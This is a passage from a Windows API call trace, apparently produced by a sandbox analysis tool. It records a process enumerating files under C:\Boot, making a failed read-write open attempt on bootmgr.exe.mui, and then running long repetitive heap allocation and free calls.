ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.895] PathFindExtensionW (pszPath="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned=".mui" [0183.895] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.898] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0183.898] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0183.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.899] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.899] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: 